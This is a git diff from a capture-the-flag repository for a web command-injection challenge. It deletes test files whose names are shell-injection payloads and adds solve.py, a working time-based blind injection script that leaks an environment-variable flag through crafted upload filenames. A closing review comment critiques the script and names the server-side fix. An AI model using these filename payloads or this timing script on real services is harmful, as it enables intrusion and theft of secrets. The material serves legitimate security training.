diff --git "a/web-cmdi/05_virusvault/a `echo \"prova\"`" "b/web-cmdi/05_virusvault/a `echo \"prova\"`"
deleted file mode 100644
index e69de29..0000000
diff --git "a/web-cmdi/05_virusvault/a\"; echo \"prova\";.jpg" "b/web-cmdi/05_virusvault/a\"; echo \"prova\";.jpg"
deleted file mode 100644
index e69de29..0000000
diff --git a/web-cmdi/05_virusvault/a; echo 'a'; .jpg b/web-cmdi/05_virusvault/a; echo 'a'; .jpg
deleted file mode 100644
index e69de29..0000000
diff --git a/web-cmdi/05_virusvault/solve.py b/web-cmdi/05_virusvault/solve.py
new file mode 100644
index 0000000..aba1727
--- /dev/null
+++ b/web-cmdi/05_virusvault/solve.py
@@ -0,0 +1,31 @@
+import string
+import time
+
+import requests
+
+files = {"specimen": ("name.txt; sleep 5", "\r\n", "application/octet-stream")}
+url = "https://552d42c0-a789-405e-82e6-fc37e974d764.offsec.m0lecon.it/scan"
+
+count = 1
+flag = ""
+banned = "/\\"
+while count < 50:
+    for char in string.printable:
+        if char not in banned:
+            # print(f"Testing {char}")
+            files = {
+                "specimen": (
+                    f"name.txt; test $(echo $FLAG | cut -c {count}) = {char} && sleep 2 ",
+                    "\r\n",
+                    "application/octet-stream",
+                )
+            }
+            start = time.perf_counter()
+            response = requests.post(url, files=files)
+            elapsed = time.perf_counter() - start
+            if elapsed > 2:
+                print(f"Found char: {char}")
+                flag += char
+                count = count + 1
+                print(f"Actual flag: {flag}")
+                break
diff --git a/web-cmdi/05_virusvault/test1.txt b/web-cmdi/05_virusvault/test1.txt
deleted file mode 100644
index 597beda..0000000
--- a/web-cmdi/05_virusvault/test1.txt
+++ /dev/null
@@ -1 +0,0 @@
-'a'; $(echo "$FLAG");
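Review bot: The module-level `files = {"specimen": ("name.txt; sleep 5", ...)}` assignment in solve.py is dead code — it is rebuilt on every loop iteration before `requests.post` is called — and `response` is bound but never read, so both should be removed (or the first probe kept only as a comment noting it was the initial confirmation). The file also has no module docstring; I would add one stating that the script exercises an upload endpoint whose multipart filename is interpolated unescaped into a shell command (the `web-cmdi` category), so a reader immediately sees that the server-side mitigation is to never pass user-supplied filenames through a shell and to invoke the scanner with an argument list instead. Minor style: `count = count + 1` reads better as `count += 1`, and the hard-coded per-instance hostname in `url` deserves a comment marking it as a throwaway challenge value rather than a reusable configuration.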